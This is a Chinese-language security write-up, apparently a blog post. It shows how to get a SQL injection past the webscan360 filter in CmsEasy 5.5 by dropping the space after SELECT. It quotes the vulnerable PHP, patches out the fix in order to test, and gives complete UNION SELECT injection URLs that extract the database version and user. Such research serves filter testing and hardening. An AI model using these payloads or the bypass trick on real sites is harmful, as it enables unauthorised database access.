这里我们就要说一下,最新版本的cmseasy了我们首先测试一个东西,在mysql中select tname,1,2,3,4 from table 这个东西想必大家都会认同,可以执行那么我们去掉select和tname之间的空格,看看这样的语句还能否执行这里我们用cmseasy的数据库测试一下SELECTcatid FROM cmseasy_archive WHERE 1
看到了没有完美执行了在之前审核cmseasy的时候第一次union select 1,2,3,4 from t 是自动会被webscan360拦截第二次union select/**/1,2,3,4 from t 这个绕过了webscan360成功执行第三次这个地方被修补了上次绕过webscan360的问题,这里我们再次测试第二次的情况会被拦截,我们不做演示了,那么我们的猜想是否正确union selecttname,1,2,3,4 from t 这个也应该会成功执行直接看代码:archive_act.php:
} elseif (front::get(front::check_type('aid'))){$this->view->archive = archive::getInstance()->getrow(front::get('aid'));
$this->view->categorys = category::getpositionlink2($this->view->archive['catid']);
$this->view->paylist = pay::getInstance()->getrows('', 50);
$this->view->logisticslist = logistics::getInstance()->getrows('', 50);
$prices = getPrices($this->view->archive['attr2']);
$this->view->archive['attr2'] = $prices['price'];
if (!is_array($this->view->archive))
$this->out('message/error.html');
if ($this->view->archive['checked'] < 1)
exit(lang('未审核!'));
if (!rank::arcget(front::get('aid'), $this->view->usergroupid)) {
$this->out('message/error.html');
}
1
2
3
4
5
6
7
8
9
10
11
12
13
}elseif(front::get(front::check_type('aid'))){$this->view->archive=archive::getInstance()->getrow(front::get('aid'));
$this->view->categorys=category::getpositionlink2($this->view->archive['catid']);
$this->view->paylist=pay::getInstance()->getrows('',50);
$this->view->logisticslist=logistics::getInstance()->getrows('',50);
$prices=getPrices($this->view->archive['attr2']);
$this->view->archive['attr2']=$prices['price'];
if(!is_array($this->view->archive))
$this->out('message/error.html');
if($this->view->archive['checked']<1)
exit(lang('未审核!'));
if(!rank::arcget(front::get('aid'),$this->view->usergroupid)){
$this->out('message/error.html');
}
这里对front::get(front::check_type('aid') 这个进行了处理,故而漏洞已经修复,我们要测是的是webscan360,所以放过这里逻辑,改为:
} elseif (true || front::get(front::check_type('aid'))){$this->view->archive = archive::getInstance()->getrow(front::get('aid'));
$this->view->categorys = category::getpositionlink2($this->view->archive['catid']);
1
2
}elseif(true||front::get(front::check_type('aid'))){$this->view->archive=archive::getInstance()->getrow(front::get('aid'));
$this->view->categorys=category::getpositionlink2($this->view->archive['catid']);
我们访问url:**.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1
那么我们访问url:**.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECTtypeid,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1
成功绕过!!!!!!!!!
1124
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
